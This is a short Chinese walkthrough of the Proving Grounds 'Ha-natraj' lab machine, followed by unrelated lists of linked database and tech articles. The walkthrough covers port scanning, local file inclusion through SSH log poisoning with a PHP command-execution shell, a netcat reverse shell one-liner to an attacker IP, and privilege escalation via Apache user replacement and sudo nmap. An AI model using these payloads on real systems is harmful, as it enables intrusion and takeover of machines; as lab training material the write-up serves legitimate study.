nmap -Pn -p- -T4 --min-rate=1000 192.168.134.80

nmap -Pn -p 22,80 -sCV 192.168.134.80

查看80端口的页面

未发现可利用的信息，对路径进行爆破

在/console目录下发现file.php

测试发现有本地文件包含

未发现别的利用方式，结合之前做过的靶机，进行日志包含，经过测试发现ssh日志可以利用


ssh登录，发现可以读取phpinfo

把shell写进日志 ‘<?php system($_GET["cmd"]);?>’

反弹shell，这里的shell需要URL编码一下
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.49.134 4444 >/tmp/f

sudo -l发现可以对apache服务进行操作

上传linpeas脚本进行枚举

思路：替换apache文件执行的用户，然后上传一个php-reverse-shell到/var/www/html目录下，这样可以弹回该用户的shell。这里不能修改为root用户，是因为改为root服务无法启动。
拷贝文件至本地，添加用户

上传至靶机，并替换掉原文件

上传shell至网站根目录

重启apache服务，得到shell



利用nmap的sudo提权
https://gtfobins.github.io/gtfobins/nmap/#sudo

PG::Ha-natraj相关推荐

1. pgpool mysql_PGPool-II+PG流复制实现HA主备切换

   基于PG的流复制能实现热备切换,但是是要手动建立触发文件实现,对于一些HA场景来说,需要当主机down了后,备机自动切换,经查询资料知道pgpool-II可以实现这种功能.本文基于PG流复制基础上 , ...

2. PGPool-II+PG流复制实现HA主备切换

   基于PG的流复制能实现热备切换,但是是要手动建立触发文件实现,对于一些HA场景来说,需要当主机down了后,备机自动切换,经查询资料知道pgpool-II可以实现这种功能.本文基于PG流复制基础上 , ...

3. pg 主键系统信息_神仙打架：PG 和 MySQL 到底哪个更好用？

   以下文章来源于 DBAplus社群概述 本文介绍MySQL和PostgreSQL的一些特性对比,让大家了解二者的优劣,更好的做出选择.当前国内的现状,互联网公司使用MySQL的较多,PostgreSQ ...

4. 神仙打架：PG 和 MySQL 到底哪个更好用？

   概述 本文介绍MySQL和PostgreSQL的一些特性对比,让大家了解二者的优劣,更好的做出选择.当前国内的现状,互联网公司使用MySQL的较多,PostgreSQL的使用比例反而不高,但相信看到P ...

5. 如何看pg数据库版本号_pg版本是什么-和pg版本相关的问题-阿里云开发者社区

   关于 pg版本的搜索结果 问题 DMS for PG 的版本 还停留在 1.7.0,发布日期是 2018-1-10,一年多了没有发布新版本了,DMS for PG 有没有更新计划? DMS for P ...

6. PostgreSQL 30天 培训视频(SQL基础,备份恢复,HA,服务端编程,大数据,内核,应用案例)

   Postgres2015全国用户大会将于11月20至21日在北京丽亭华苑酒店召开.本次大会嘉宾阵容强大,国内顶级PostgreSQL数据库专家将悉数到场,并特邀欧洲.俄罗斯.日本.美国等国家和地区的数 ...

7. 【自建分布式数据库详细指南】（四）设计：CITUS分布式数据仓库OLAP/OLTP的架构选择及PG数据库优化方法策略

   关于数据库的整体设计,很少有书籍专门试讲,因为这需要博大精深的理论水平以及阅历丰富的工作经验,但往往这两者不可兼得,在设计数据库时需要考虑多方面的因素,如需求,数据体量,数据库架构,硬件环境,成本.这 ...

8. 数据库周刊28│开发者最喜爱的数据库是什么？阿里云脱口秀聊程序员转型；MySQL update误操作；PG流复制踩坑；PG异机归档；MySQL架构选型；Oracle技能表……

   文章来源:墨天轮社区 https://www.modb.pro/db/26343 摘要:墨天轮数据库周刊第28期发布啦,每周1次推送本周数据库相关热门资讯.精选文章.干货文档.本周分享 开发者最喜爱的 ...

9. DTS 及其在PG 数据库生态中的应用

   目录 一.PostgreSQL 数据传输通道关键技术 (一)什么是数据传输通道? (二)PostgreSQL 内置数据类型 (三)PostgreSQL 分区表 (四)PostgreSQL 增量数据获取 ...

10. NFS HA架构部署(NFS + Pacemaker + Corosync + DRBD)

    NFS HA架构部署(NFS + Pacemaker + Corosync + DRBD) 环境:kvm虚拟机2台 OS:CentOS7.6 Kernel: Linux 3.10.0-957.21.3 ...

最新文章

1. 线程常用方法,线程安全和同步锁
2. Nike Barkley Foamposite Max “Rayguns”
3. 【Python】Python字典的高级用法-统计计数
4. 利用string 字符串拷贝
5. 计算机网络上网时间,电脑怎么限制上网时间
6. PHP array_count_values() 函数用于统计数组中所有值出现的次数。
7. 操作系统知识点大总结【管程与死锁】
8. mysql连接被拒绝 密码也对_解决Mysql数据库拒绝远程连接和忘记密码的问题
9. 8196国开计算机专业英语,电大计算机网络（本）学习周期01任务A_0002答案
10. Map集合常用方法总结
11. 《数据挖掘概念与技术》读书笔记（一）
12. 大话存储系列19——数据容灾
13. [ZZ] Maxwell 架构
14. 读《论人类不平等的起源和基础》
15. 大数据典型的应用场景
16. mysql程序选项有两种通用形式:长选项和短选项_MySQL程序概述
17. 快速提高点击率的办法
18. day11-字符流、属性集、缓冲流、转换流、序列化流笔记
19. 6、【斯纳克学生微信缴费平台】家长手机微信缴费
20. 访问苹果开发者网站太慢

热门文章

1. 阿里OSS--基本介绍
2. gperftools的安装与使用
3. VSCode+Evernote+markdown
4. GitHub Desktop 安装和使用（附：百度云下载地址，永久有效）
5. Java复习打卡day47
6. 三菱PLC编程软件GX WORKS3中如何使用FB函数块？
7. 2022年一年级入学小结
8. 删除的照片怎么才能恢复
9. 外贸往来的业务邮件如何管理？
10. 7位双极性序列 matlab,移动通信课程设计报告实验报告-利用matlab进行m序列直接扩频仿真.doc...